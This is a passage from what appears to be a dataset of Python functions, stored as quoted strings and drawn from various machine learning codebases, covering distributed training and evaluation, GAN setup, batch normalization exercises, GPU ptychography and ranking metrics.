torch.cuda.synchronize() if torch.cuda.is_available() else None\n return\n\n elif command == COMMAND_SYNC_NODES: # Only for sync calls\n print_rank(f\"COMMMAND_SYNC_NODES received {rank()}\", loglevel=logging.DEBUG)\n\n gather_objects = [None for i in range(size())]\n output = [None for _ in gather_objects]\n dist.all_gather_object(output, gather_objects[rank()])\n print_rank(f\"Worker IDLE {rank()} sent dummy output back\", loglevel=logging.DEBUG)\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n else:\n assert False, \"unknown command\"", "def validate_average_rank(self) -> float:\n logger.info('Average rank validation ...')\n\n args = self.args\n self.biencoder.eval()\n distributed_factor = self.distributed_factor\n\n if args.use_dict_input:\n data_iterator = self.get_dict_data_iterator(args.dev_psgs_file, args.dev_queries_file,\n args.dev_qrels_file, args.dev_trec_file,\n args.dev_batch_size,\n shuffle=False, split=False)\n else:\n data_iterator = self.get_data_iterator(args.dev_file, args.dev_batch_size, shuffle=False)\n\n sub_batch_size = args.val_av_rank_bsz\n sim_score_f = ClusterNllLoss.get_similarity_function()\n q_represenations = []\n ctx_represenations = []\n positive_idx_per_question = []\n\n num_hard_negatives = args.val_av_rank_hard_neg\n num_other_negatives = args.val_av_rank_other_neg\n\n log_result_step = args.log_batch_step\n\n for i, samples_batch in enumerate(data_iterator.iterate_data()):\n # samples += 1\n if len(q_represenations) > args.val_av_rank_max_qs / distributed_factor:\n break\n\n biencoder_input = ClusterBertEncoder.create_biencoder_input(samples_batch, self.tensorizer,\n True,\n max_query_length=args.query_sequence_length,\n max_doc_length=args.sequence_length,\n num_hard_negatives=num_hard_negatives,\n num_other_negatives=num_other_negatives,\n shuffle=False)\n total_ctxs = len(ctx_represenations)\n ctxs_ids = biencoder_input.context_ids\n ctxs_segments = biencoder_input.ctx_segments\n bsz = ctxs_ids.size(0)\n\n # split contexts batch into sub batches since it is supposed to be too large to be processed in one batch\n for j, batch_start in enumerate(range(0, bsz, sub_batch_size)):\n\n q_ids, q_segments = (biencoder_input.question_ids, biencoder_input.question_segments) if j == 0 \\\n else (None, None)\n\n if j == 0 and args.n_gpu > 1 and q_ids.size(0) == 1:\n # if we are in DP (but not in DDP) mode, all model input tensors should have batch size >1 or 0,\n # otherwise the other input tensors will be split but only the first split will be called\n continue\n\n ctx_ids_batch = ctxs_ids[batch_start:batch_start + sub_batch_size]\n ctx_seg_batch = ctxs_segments[batch_start:batch_start + sub_batch_size]\n\n q_attn_mask = self.tensorizer.get_attn_mask(q_ids)\n ctx_attn_mask = self.tensorizer.get_attn_mask(ctx_ids_batch)\n with torch.no_grad():\n q_dense, ctx_dense = self.biencoder(q_ids, q_segments, q_attn_mask, ctx_ids_batch, ctx_seg_batch,\n ctx_attn_mask)\n\n if q_dense is not None:\n q_represenations.extend(q_dense.cpu().split(1, dim=0))\n\n ctx_represenations.extend(ctx_dense.cpu().split(1, dim=0))\n\n batch_positive_idxs = biencoder_input.is_positive\n positive_idx_per_question.extend([total_ctxs + v for v in batch_positive_idxs])\n\n if (i + 1) % log_result_step == 0:\n logger.info('Av.rank validation: step %d, computed ctx_vectors %d, q_vectors %d', i,\n len(ctx_represenations), len(q_represenations))\n\n ctx_represenations = torch.cat(ctx_represenations, dim=0)\n q_represenations = torch.cat(q_represenations, dim=0)\n\n logger.info('Av.rank validation: total q_vectors size=%s', q_represenations.size())\n logger.info('Av.rank validation: total ctx_vectors size=%s', ctx_represenations.size())\n\n q_num = q_represenations.size(0)\n assert q_num == len(positive_idx_per_question)\n\n scores = sim_score_f(q_represenations, ctx_represenations)\n values, indices = torch.sort(scores, dim=1, descending=True)\n\n rank = 0\n for i, idx in enumerate(positive_idx_per_question):\n # aggregate the rank of the known gold passage in the sorted results for each question\n gold_idx = (indices[i] == idx).nonzero()\n rank += gold_idx.item()\n\n if distributed_factor > 1:\n # each node calcuated its own rank, exchange the information between node and calculate the \"global\" average rank\n # NOTE: the set of passages is still unique for every node\n eval_stats = all_gather_list([rank, q_num], max_size=1000)\n for i, item in enumerate(eval_stats):\n remote_rank, remote_q_num = item\n if i != args.local_rank:\n rank += remote_rank\n q_num += remote_q_num\n\n av_rank = float(rank / q_num)\n logger.info('Av.rank validation: average rank %s, total questions=%d', av_rank, q_num)\n return av_rank", "def main():\n\n global G\n global C\n global D\n\n global device\n\n global c_solver\n global g_solver\n global d_optimiser\n\n global BCELossFunc\n\n # define random seed to allow reporducibility\n seed = 97\n torch.manual_seed(seed)\n random.seed(seed)\n\n # optimise for GPU learned from Vanilla GAN tutorial:\n # https://medium.com/ai-society/gans-from-scratch-1-a-deep-introduction-with-code-in-pytorch-and-tensorflow-cb03cdcdba0f\n device = torch.device(\"cuda:0\" if (torch.cuda.is_available() and NUM_GPUS > 0) else \"cpu\")\n\n # Generator\n G = Generator(NUM_GPUS).to(device)\n G.apply(initialise_weights)\n if (device.type == 'cuda') and (NUM_GPUS > 1):\n G = nn.DataParallel(G, list(range(NUM_GPUS)))\n\n # Discriminator\n C = Critic(NUM_GPUS).to(device)\n C.apply(initialise_weights)\n if (device.type == 'cuda') and (NUM_GPUS > 1):\n C = nn.DataParallel(C, list(range(NUM_GPUS)))\n\n # Discriminator\n D = Discriminator(NUM_GPUS).to(device)\n D.apply(initialise_weights)\n if (device.type == 'cuda') and (NUM_GPUS > 1):\n D = nn.DataParallel(D, list(range(NUM_GPUS)))\n\n # loss function and optimisers as in DCGAN paper\n BCELossFunc = nn.BCELoss()\n d_optimiser = optim.Adam(D.parameters(), lr=1e-4)\n\n # loss function and optimisers\n c_solver = optim.RMSprop(C.parameters(), lr=1e-4)\n g_solver = optim.RMSprop(G.parameters(), lr=1e-4)\n\n path = \"../output/WGAN/newResults\"\n\n epochs = train(path)\n\n # last parameter is optional for saving critic\n save_model(D, G, path, epochs, C)", "def update_grhs():\n init_gradient()\n costs_per_batch = []\n for i in range(n_train_batches):\n c = update_gradient_batch(i,*args)\n costs_per_batch.append(c)\n return numpy.mean(costs_per_batch,axis=0)", "def compute_values(self, update_statistics=False):\n\n self.compute_iterations()\n self.axsec = sum([one.axsec for one in self])\n self.xsec = sum([one.xsec for one in self])\n self.xerrc = sum([one.xerrc for one in self])\n self.xerru = math.sqrt(sum([one.xerru**2 for one in self]))\n\n self.nevents = sum([one.nevents for one in self])\n self.nw = sum([one.nw for one in self])\n self.maxit = len(self.yerr_iter) # \n self.nunwgt = sum([one.nunwgt for one in self]) \n self.wgt = 0\n self.luminosity = min([0]+[one.luminosity for one in self])\n if update_statistics:\n self.run_statistics.aggregate_statistics([_.run_statistics for _ in self])", "def batchnorm_forward(x, gamma, beta, bn_param):\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n \n mu = np.mean(x, axis=0)\n var = np.var(x, axis=0)\n sigma = np.sqrt(var+eps)\n if mode == 'train':\n #######################################################################\n # TODO: Implement the training-time forward pass for batch norm. #\n # Use minibatch statistics to compute the mean and variance, use #\n # these statistics to normalize the incoming data, and scale and #\n # shift the normalized data using gamma and beta. #\n # #\n # You should store the output in the variable out. Any intermediates #\n # that you need for the backward pass should be stored in the cache #\n # variable. #\n # #\n # You should also use your computed sample mean and variance together #\n # with the momentum variable to update the running mean and running #\n # variance, storing your result in the running_mean and running_var #\n # variables. #\n # #\n # Note that though you should be keeping track of the running #\n # variance, you should normalize the data based on the standard #\n # deviation (square root of variance) instead! # \n # Referencing the original paper (https://arxiv.org/abs/1502.03167) #\n # might prove to be helpful. #\n #######################################################################\n out = gamma * (x - mu)/sigma + beta\n #out = (x - mu)/sigma\n #out = out * gamma.T + beta.T\n #print(gamma.shape)\n #out = out * gamma + beta\n #print(out.shape)\n \n running_mean = momentum * running_mean + (1 - momentum) * mu\n running_var = momentum * running_var + (1 - momentum) * (var+eps)\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n elif mode == 'test':\n #######################################################################\n # TODO: Implement the test-time forward pass for batch normalization. #\n # Use the running mean and variance to normalize the incoming data, #\n # then scale and shift the normalized data using gamma and beta. #\n # Store the result in the out variable. #\n #######################################################################\n out = (x - running_mean) / np.sqrt(running_var) * gamma + beta\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n cache = (x, mu, sigma, gamma, beta)\n return out, cache", "def grad_ptycho_multi_gpu(self, data, psi, prb, scan, hlamd, rho, piter, recover_prb, lock, ids):\n global BUSYGPUS\n lock.acquire() # will block if lock is already held\n for k in range(self.ngpus):\n if BUSYGPUS[k] == 0:\n BUSYGPUS[k] = 1\n gpu = k\n break\n lock.release()\n\n cp.cuda.Device(gpu).use()\n data_gpu = cp.array(data[ids], order='C')\n psi_gpu = cp.array(psi[ids])\n hlamd_gpu = cp.array(hlamd[ids])\n prb_gpu = cp.array(prb[ids])\n scan_gpu = cp.array(scan[:, ids])\n\n psi_gpu, prb_gpu = self.grad_ptycho(\n data_gpu, psi_gpu, prb_gpu, scan_gpu, hlamd_gpu, rho, piter, recover_prb, gpu)\n\n psi[ids] = psi_gpu.get()\n prb[ids] = prb_gpu.get()\n\n BUSYGPUS[gpu] = 0\n\n return psi[ids], prb[ids]", "def test_distributed(self):\n self.model.eval()\n test_loss, test_correct_preds = 0, defaultdict(int)\n if self.test_loader is None: # running G2E\n self.test_loader, self.test_size, self.test_sampler = self._get_smi_dl(phase=\"test\", shuffle=False)\n self.test_sampler.set_epoch(0)\n if self.rank == 0:\n test_loader = tqdm(self.test_loader, desc='testing...')\n else:\n test_loader = self.test_loader\n \n running_topk_accs = defaultdict(lambda: np.nan)\n with torch.no_grad():\n epoch_test_size = 0\n for i, batch in enumerate(test_loader):\n batch_data = batch[0]\n if not isinstance(batch_data, tuple):\n batch_data = batch_data.cuda(non_blocking=True)\n if self.model_name == 'TransformerEBM':\n batch_data = (batch_data, 'test')\n batch_mask = batch[1].cuda(non_blocking=True)\n batch_energies = self._one_batch(\n batch_data, batch_mask, backprop=False,\n )\n test_batch_size = batch_energies.shape[0]\n test_batch_size = torch.tensor([test_batch_size]).cuda(self.gpu, non_blocking=True)\n dist.all_reduce(test_batch_size, dist.ReduceOp.SUM)\n test_batch_size = test_batch_size.item()\n epoch_test_size += test_batch_size\n\n # for validation/test data, true rxn may not be present!\n batch_idx = batch[2]\n batch_true_ranks_array = self.proposals_data['test'][batch_idx, 2].astype('int')\n batch_true_ranks_valid = batch_true_ranks_array[batch_true_ranks_array < self.args.minibatch_eval]\n batch_true_ranks = torch.as_tensor(batch_true_ranks_array).unsqueeze(dim=-1)\n # slightly tricky as we have to ignore rxns with no 'positive' rxn for loss calculation\n # (bcos nothing in the numerator, loss is undefined)\n loss_numerator = batch_energies[\n np.arange(batch_energies.shape[0])[batch_true_ranks_array < self.args.minibatch_eval],\n batch_true_ranks_valid\n ]\n loss_denominator = batch_energies[\n np.arange(batch_energies.shape[0])[batch_true_ranks_array < self.args.minibatch_eval],\n :\n ]\n batch_loss = (loss_numerator + torch.logsumexp(-loss_denominator, dim=1)).sum().item()\n\n for k in self.k_to_test:\n # index with lowest energy is what the model deems to be the most feasible rxn\n batch_preds = torch.topk(batch_energies, k=k, dim=1, largest=False)[1] \n batch_correct_preds = torch.where(batch_preds == batch_true_ranks)[0].shape[0]\n batch_correct_preds = torch.tensor([batch_correct_preds]).cuda(self.gpu, non_blocking=True)\n dist.all_reduce(batch_correct_preds, dist.ReduceOp.SUM)\n batch_correct_preds = batch_correct_preds.item()\n test_correct_preds[k] += batch_correct_preds\n running_topk_accs[k] = test_correct_preds[k] / epoch_test_size\n\n if k == 1 and self.rank == 0: # overhead is only 5 ms, will check ~5 times each epoch (regardless of batch_size)\n try:\n for j in range(i * self.args.batch_size_eval, (i+1) * self.args.batch_size_eval):\n if j % (self.test_size // 5) == random.randint(0, 3) or j % (self.test_size // 8) == random.randint(0, 5): # peek at a random sample of current batch to monitor training progress\n rxn_idx = random.sample(list(range(self.args.batch_size_eval)), k=1)[0]\n rxn_true_rank = batch_true_ranks_array[rxn_idx]\n rxn_pred_rank = batch_preds[rxn_idx, 0].item()\n rxn_pred_energy = batch_energies[rxn_idx, rxn_pred_rank].item()\n rxn_true_energy = batch_energies[rxn_idx, rxn_true_rank].item() if rxn_true_rank != 9999 else 'NaN'\n rxn_orig_energy = batch_energies[rxn_idx, 0].item()\n rxn_orig_energy2 = batch_energies[rxn_idx, 1].item()\n rxn_orig_energy3 = batch_energies[rxn_idx, 2].item()\n\n rxn_true_prod = self.proposals_data['test'][batch_idx[rxn_idx], 0]\n rxn_true_prec = self.proposals_data['test'][batch_idx[rxn_idx], 1]\n rxn_cand_precs = self.proposals_data['test'][batch_idx[rxn_idx], 3:]\n rxn_pred_prec = rxn_cand_precs[batch_preds[rxn_idx]]\n rxn_orig_prec = rxn_cand_precs[0]\n rxn_orig_prec2 = rxn_cand_precs[1]\n rxn_orig_prec3 = rxn_cand_precs[2]\n logging.info(f'\\ntrue product: \\t\\t\\t\\t{rxn_true_prod}')\n logging.info(f'pred precursor (rank {rxn_pred_rank}, energy = {rxn_pred_energy:+.4f}):\\t\\t\\t{rxn_pred_prec}')\n if rxn_true_energy == 'NaN':\n logging.info(f'true precursor (rank {rxn_true_rank}, energy = {rxn_true_energy}):\\t\\t\\t\\t{rxn_true_prec}')\n else:\n logging.info(f'true precursor (rank {rxn_true_rank}, energy = {rxn_true_energy:+.4f}):\\t\\t\\t{rxn_true_prec}')\n logging.info(f'orig precursor (rank 0, energy = {rxn_orig_energy:+.4f}):\\t\\t\\t{rxn_orig_prec}')\n logging.info(f'orig precursor (rank 1, energy = {rxn_orig_energy2:+.4f}):\\t\\t\\t{rxn_orig_prec2}')\n logging.info(f'orig precursor (rank 2, energy = {rxn_orig_energy3:+.4f}):\\t\\t\\t{rxn_orig_prec3}\\n')\n break\n except Exception as e:\n tb_str = traceback.format_exception(etype=type(e), value=e, tb=e.__traceback__)\n logging.info(\"\".join(tb_str))\n logging.info('\\nIndex out of range (last minibatch)')\n \n batch_loss = torch.tensor([batch_loss]).cuda(self.gpu, non_blocking=True)\n dist.all_reduce(batch_loss, dist.ReduceOp.SUM)\n batch_loss = batch_loss.item()\n test_loss += batch_loss\n if self.rank == 0:\n test_loader.set_description(f\"testing...loss={test_loss / test_batch_size:.4f}, top-1 acc={running_topk_accs[1]:.4f}, top-5 acc={running_topk_accs[5]:.4f}, top-10 acc={running_topk_accs[10]:.4f}\")\n test_loader.refresh()\n \n for k in self.k_to_test:\n self.test_topk_accs[k] = test_correct_preds[k] / epoch_test_size\n \n dist.barrier()\n message = f\"{self.args.expt_name}\\n\"\n if self.rank == 0:\n logging.info(f'\\nTest loss: {test_loss / epoch_test_size:.4f}')\n for k in self.k_to_test:\n this_topk_message = f'Test top-{k} accuracy: {100 * self.test_topk_accs[k]:.3f}%'\n logging.info(this_topk_message)\n message += this_topk_message + '\\n'\n try:\n send_message(message)\n except Exception as e:\n pass", "def perturb_and_get_rank(embedding, w, a, r, b, test_size, batch_size=100, all_batches=True, flow_log_prob=None):\n n_batch = (test_size + batch_size - 1) // batch_size\n ranks = []\n if all_batches is False:\n n_batch = 1\n # import ipdb;ipdb.set_trace()\n for idx in range(n_batch): # n_batch TODO\n batch_start = idx * batch_size\n batch_end = min(test_size, (idx + 1) * batch_size)\n batch_a = a[batch_start: batch_end]\n batch_r = r[batch_start: batch_end]\n emb_ar = embedding[batch_a] * w[batch_r]\n emb_ar = emb_ar.transpose(0, 1).unsqueeze(2) # size: D x E x 1\n emb_c = embedding.transpose(0, 1).unsqueeze(1) # size: D x 1 x V\n # out-prod and reduce sum\n out_prod = torch.bmm(emb_ar, emb_c) # size D x E x V\n score = torch.sum(out_prod, dim=0) # size E x V\n if score is not None:\n score = score + flow_log_prob\n score = torch.sigmoid(score)\n target = b[batch_start: batch_end]\n ranks.append(sort_and_rank(score, target))\n\n _running_ranks = 1.0+torch.cat((ranks)).float()\n mrr = torch.mean(1.0 / _running_ranks)\n mr = torch.mean(_running_ranks)\n avg_count = []\n for hit in [1,5,10]:\n avg_count.append( torch.mean((_running_ranks <= hit).float()).item())\n print(\"batch {} / {}: MR : {:.6f} | MRR : {:.6f} | Hit1: {:.6f} | Hit5: {:.6f} | Hit10: {:.6f}\".format(\n idx, n_batch, mr.item(), mrr.item(), avg_count[0], avg_count[1], avg_count[2]))\n\n return torch.cat(ranks)", "def calc_and_store_numba(kernel, storage_backend, fft_data, ch_it, info_dict):\n from mpi4py import MPI\n import datetime\n from socket import gethostname\n import numpy as np\n import math\n\n comm = MPI.COMM_WORLD\n\n # Code below tests dummy kernel\n # out_arr = np.zeros(100)\n # threadsperblock = 32\n # blockspergrid = (out_arr.size + (threadsperblock - 1)) // threadsperblock\n # kernel[blockspergrid, threadsperblock](out_arr)\n # End test of dummy kernel\n\n result = np.zeros([len(ch_it), fft_data.data.shape[1], 3], dtype=fft_data.data.dtype)\n \n threads_per_block = (32, 32)\n num_blocks = [math.ceil(s / t) for s, t in zip(result.shape, threads_per_block)]\n ch1_idx_arr = np.array([c.ch1.get_idx() for c in ch_it])\n ch2_idx_arr = np.array([c.ch2.get_idx() for c in ch_it])\n win_factor = 1.0\n\n # Try changing flags to C_CONTIGUOUS\n # Passing fft_data.data directly into the kernel always fails.\n # I checked size and passing a dummy array of similar shape and dtype.\n # That worked, buy never fft_data.data\n # I also checked the flags. fft_data.data.C_CONTIGUOUS was false. Setting it to true\n # also didn't allow me to pass this into the kernel.\n # Now I'm doing this here:\n dummy = np.zeros(fft_data.data.shape, dtype=fft_data.data.dtype)\n dummy[:] = fft_data.data[:]\n\n t1_calc = datetime.datetime.now()\n kernel[num_blocks, threads_per_block](dummy, result, ch1_idx_arr, ch2_idx_arr, win_factor)\n\n t2_calc = datetime.datetime.now()\n\n t1_io = datetime.datetime.now()\n storage_backend.store_data(result, info_dict)\n dt_io = datetime.datetime.now() - t1_io\n\n with open(f\"outfile_{comm.rank:03d}.txt\", \"a\") as df:\n # df.write(f\"success: num_blocks={num_blocks}, tpb={threads_per_block}... {fft_data.data.dtype}, {fft_data.data.shape}... \")\n # df.write(f\"dummy: {dummy.flags}, fft_data.data: {fft_data.data.flags}\")\n df.write((f\"rank {comm.rank:03d}/{comm.size:03d}: \"\n f\"tidx={info_dict['chunk_idx']} {info_dict['analysis_name']} \"\n f\"start {t1_calc.isoformat(sep=' ')} \"\n f\"end {t2_calc.isoformat(sep=' ')} \"\n f\"Storage: {dt_io} {gethostname()}\\n\"))\n df.flush()\n\n return None", "def compute(self) -> Tuple[float, float, float]:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n self.statistics = {\n k: xm.mesh_reduce(k, v, np.sum) for k, v in self.statistics.items()\n }\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[int] = all_gather(self.statistics[key])\n value: int = sum(value)\n self.statistics[key] = value\n\n precision_value, recall_value, f1_value = get_binary_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n zero_division=self.zero_division,\n )\n return precision_value, recall_value, f1_value", "def update_prior_dist(batch_size, alpha, beta):\n global prior_dist\n grid_points = torch.arange(1., 2*batch_size, 2.).float().cuda() / (2*batch_size)\n grid_points_np = grid_points.cpu().numpy()\n grid_points_icdf = stats.beta.ppf(grid_points_np, a=alpha, b=beta)\n prior_dist = torch.tensor(grid_points_icdf).float().cuda().unsqueeze(1)", "def batchnorm_forward(x, gamma, beta, bn_param):\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n if mode == 'train':\n #######################################################################\n # TODO: Implement the training-time forward pass for batch norm. #\n # Use minibatch statistics to compute the mean and variance, use #\n # these statistics to normalize the incoming data, and scale and #\n # shift the normalized data using gamma and beta. #\n # #\n # You should store the output in the variable out. Any intermediates #\n # that you need for the backward pass should be stored in the cache #\n # variable. #\n # #\n # You should also use your computed sample mean and variance together #\n # with the momentum variable to update the running mean and running #\n # variance, storing your result in the running_mean and running_var #\n # variables. #\n # #\n # Note that though you should be keeping track of the running #\n # variance, you should normalize the data based on the standard #\n # deviation (square root of variance) instead! # \n # Referencing the original paper (https://arxiv.org/abs/1502.03167) #\n # might prove to be helpful. #\n #######################################################################\n \n sample_mean = np.mean(x, axis=0)\n sample_variance = np.var(x, axis=0)\n \n running_mean = momentum * running_mean + (1 - momentum) * sample_mean\n running_var = momentum * running_var + (1 - momentum) * sample_variance\n \n num = x - sample_mean\n denom = np.sqrt(sample_variance + eps)\n \n x_hat = num/denom\n out = gamma*x_hat + beta\n \n cache = (gamma, x_hat, num, denom, eps, sample_variance)\n\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n elif mode == 'test':\n #######################################################################\n # TODO: Implement the test-time forward pass for batch normalization. #\n # Use the running mean and variance to normalize the incoming data, #\n # then scale and shift the normalized data using gamma and beta. #\n # Store the result in the out variable. #\n #######################################################################\n num = x - running_mean\n denom = np.sqrt(running_var + eps)\n \n x_hat = num/denom\n out = gamma*x_hat + beta\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n\n return out, cache", "def CUDA(self):\n\n if helpers.CUDA:\n self.generator.cuda()\n self.discriminator.cuda()\n self.adv_loss.cuda()", "def calculate_macs(self) -> None:\n for name, param in self.module.named_parameters():\n if name == \"weight\":\n # ignore N, C when calculate Mult-Adds in ConvNd\n if \"Conv\" in self.class_name:\n self.macs += int(param.nelement() * prod(self.output_size[2:]))\n else:\n self.macs += param.nelement()\n # RNN modules have inner weights such as weight_ih_l0\n elif \"weight\" in name:\n self.macs += param.nelement()", "def get_nml_probs(x, model, data=None, normalize=True, num_classes=2, query_point_weight=20, dist_weight_thresh=None, \n num_grad_steps=10, lr=0.01, batch_size=32, grad_penalty=None, verbose=False, \n show_plots=False, plotting_2d=False, return_params=False):\n results = []\n data = data or DEFAULT_DATA\n orig_inputs, orig_targets = data\n \n if show_plots and plotting_2d:\n plt.figure()\n plt.title(f\"Original rewards\")\n plot_rewards(model, contours=True)\n plot_dataset(data)\n \n marker_for_class = {\n 0: 'x',\n 1: '*'\n }\n \n model.cuda()\n num_batches = ceil(len(orig_inputs) / batch_size)\n\n # NOTE train on gpu, move back to cpu for eval\n \n for proposed_class in range(num_classes):\n new_model = copy.deepcopy(model)\n new_model.cuda()\n \n # Sample all of the adaptation batches in advance\n optimizer = optim.SGD(new_model.parameters(), lr=lr)\n \n for _ in range(num_grad_steps):\n idxs = np.random.permutation(range(len(orig_inputs)))[:batch_size-1]\n X, y = orig_inputs[idxs], orig_targets[idxs]\n X = torch.Tensor(np.vstack((X, x))).cuda()\n y = torch.Tensor(np.hstack((y, proposed_class))).long().cuda()\n \n logits = new_model(X)\n loss = F.cross_entropy(logits, y, reduction='none')\n \n if dist_weight_thresh:\n weights = np.exp(-np.linalg.norm(x - X.cpu().numpy(), axis=-1) * 2.3 / dist_weight_thresh)\n else:\n weights = np.ones(len(y))\n \n weights[-1] *= query_point_weight * 1. / num_batches\n weights = torch.Tensor(weights).cuda()\n loss = torch.sum(loss * weights) / torch.sum(weights)\n \n loss.backward()\n optimizer.step()\n \n new_model.cpu()\n \n with torch.no_grad():\n x_tensor = torch.Tensor(x[None])\n probs = torch.softmax(new_model(x_tensor), -1)\n results.append(probs[0][proposed_class].item())\n \n if show_plots:\n new_model.to(torch.device(\"cpu\"))\n\n if plotting_2d: \n plt.figure()\n plot_rewards(new_model, contours=True, env = False, title=f\"Finetuning on label {proposed_class}\")\n plot_dataset(data)\n plt.scatter(x[0], x[1], marker=marker_for_class[proposed_class], color='w', s=100)\n \n plt.figure()\n plt.title(f\"Losses for label {proposed_class}\")\n plt.plot(losses)\n \n plt.figure()\n plt.title(f\"x loss for label {proposed_class}\")\n plt.plot(x_losses)\n \n plt.figure()\n plt.title(f\"x probs for label {proposed_class}\")\n plt.plot(x_vals)\n \n model.cpu()\n \n if normalize:\n results = np.array(results) / sum(results)\n else:\n results = np.array(results)\n return results if not return_params else (results, new_model)", "def compute_all(self) -> None:\n self.compute_j_matrix()\n self.compute_outter_distribution()\n self.compute_max_prior()\n self.compute_max_poutter()", "def conv_bn_relu_backward(dout, cache):\n conv_cache, sbn_cache, relu_cache = cache\n da = relu_backward(dout, relu_cache)\n dan, dgamma, dbeta = spatial_batchnorm_backward(da, sbn_cache)\n dx, dw, db = conv_backward_fast(dan, conv_cache)\n return dx, dw, db, dgamma, dbeta", "def reset_ref_batch(self, batch):\n with torch.no_grad():\n self.labels = batch[1]\n self.batch = batch[0]\n _, self.r_act_2, _ = self.inference_net(self.batch.cuda(self.gpu_id))\n\n self.mu2_c0, self.sigma2_c0 = calc_stats(self.r_act_2[self.labels.view(-1) == 0])\n self.mu2_c1, self.sigma2_c1 = calc_stats(self.r_act_2[self.labels.view(-1) == 1])", "def setup_gpu_and_random(config):\n random.seed(config.general.manualSeed)\n np.random.seed(config.general.manualSeed)\n torch.manual_seed(config.general.manualSeed)\n torch.cuda.manual_seed(config.general.manualSeed)\n\n cudnn.benchmark = True\n cudnn.deterministic = True\n config.num_gpu = torch.cuda.device_count()\n\n if config.num_gpu > 1:\n print('------ Use multi-GPU setting ------')\n print('if you stuck too long time with multi-GPU setting, try to set --workers 0')\n # check multi-GPU issue https://github.com/clovaai/deep-text-recognition-benchmark/issues/1\n config.workers = config.workers * config.num_gpu\n config.batch_size = config.batch_size * config.num_gpu\n\n \"\"\" previous version\n print('To equlize batch stats to 1-GPU setting, the batch_size is multiplied with num_gpu and multiplied batch_size is ', opt.batch_size)\n opt.batch_size = opt.batch_size * opt.num_gpu\n print('To equalize the number of epochs to 1-GPU setting, num_iter is divided with num_gpu by default.')\n If you dont care about it, just commnet out these line.)\n opt.num_iter = int(opt.num_iter / opt.num_gpu)\n \"\"\"", "def compute(self) -> Tuple[float, float, float]:\n # @TODO: ddp hotfix, could be done better\n if self._is_ddp:\n for key in self.statistics:\n value: List[float] = all_gather(self.statistics[key])\n value: float = sum(value)\n self.statistics[key] = value\n\n precision_value, recall_value, f1_value = get_binary_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n zero_division=self.zero_division,\n )\n return precision_value, recall_value, f1_value", "def prediction_aggregation(self, xt_s,mu_s,var_s, method='PoE', weighting='uniform', power=26):\n\n nt = xt_s.shape[0]\n mu = np.zeros([nt, self.C],dtype='float64')\n var = np.zeros([nt, self.C],dtype='float64')\n\n prior_var = self.experts[0].kernel(xt_s[0], xt_s[0])\n\n \n #Process each latent gp individually \n for j in range(self.C):\n \n mu_s_c = mu_s[:, :, j]\n var_s_c = var_s[:, :, j]\n \n weight_matrix = compute_weights(mu_s_c, var_s_c, power, weighting, prior_var)\n \n prec_s= 1/var_s_c\n\n if method == 'PoE':\n \n prec = tf.reduce_sum(prec_s, axis=0)\n \n\n if method == 'gPoE':\n \n weight_matrix = normalize_weights(weight_matrix)\n\n prec = tf.reduce_sum(weight_matrix * prec_s , axis=0)\n \n\n if method == 'BCM':\n \n prec = tf.reduce_sum(prec_s, axis=0) + (1 - self.M) / prior_var \n\n if method == 'rBCM':\n \n \n prec = tf.reduce_sum(weight_matrix * prec_s, axis=0) \\\n + (1 - tf.reduce_sum(weight_matrix, axis=0)) / prior_var\n \n \n \n if method != 'bar':\n \n var[:, j] = 1 / prec\n\n mu[:, j] = var[:, j] * tf.reduce_sum(weight_matrix * prec_s * mu_s_c, axis=0)\n \n else:\n \n weight_matrix = normalize_weights(weight_matrix)\n\n mu[:, j] = tf.reduce_sum(weight_matrix * mu_s_c, axis=0)\n var[:, j] = tf.reduce_sum(weight_matrix * var_s_c, axis=0)\n \n \n return self.lik_aggregation(mu, var)", "def spatial_batchnorm_forward(x, gamma, beta, bn_param):\n out, cache = None, None\n\n #############################################################################\n # TODO: Implement the forward pass for spatial batch normalization. #\n # #\n # HINT: You can implement spatial batch normalization using the vanilla #\n # version of batch normalization defined above. Your implementation should #\n # be very short; ours is less than five lines. #\n #############################################################################\n pass\n #############################################################################\n # END OF YOUR CODE #\n #############################################################################\n\n return out, cache", "def stats(self):\n remaining_params, total_params = 0, 0 \n for mask, _ in self.masked_parameters:\n remaining_params += mask.detach().cpu().numpy().sum()\n total_params += mask.numel()\n return remaining_params, total_params", "def update_net(optimizer):\n assert kl_train_dataset.bp_mode\n frames_gen, frame_cnt, rel_props, prop_ticks, prop_scaling = kl_train_dataset[index]\n\n optimizer.zero_grad()\n \n num_crop = 1\n length = 3\n if args.modality == 'Flow':\n length = 10\n elif args.modality == 'RGBDiff':\n length = 18\n \n for frames in frames_gen:\n # frames.shape == [frame_batch_size * num_crop * 3, 224, 224]\n assert len(frames) == length * frame_cnt\n input_var = torch.autograd.Variable(frames.view(-1, length, frames.size(-2), frames.size(-1)).cuda())\n base_out = net(input_var, None, None, None, None)\n assert base_out.size(0) == frame_cnt and base_out.size(1) == base_out_dim\n step_features = base_out.mean(dim=0).unsqueeze(0)\n gate, glcu_task_pred 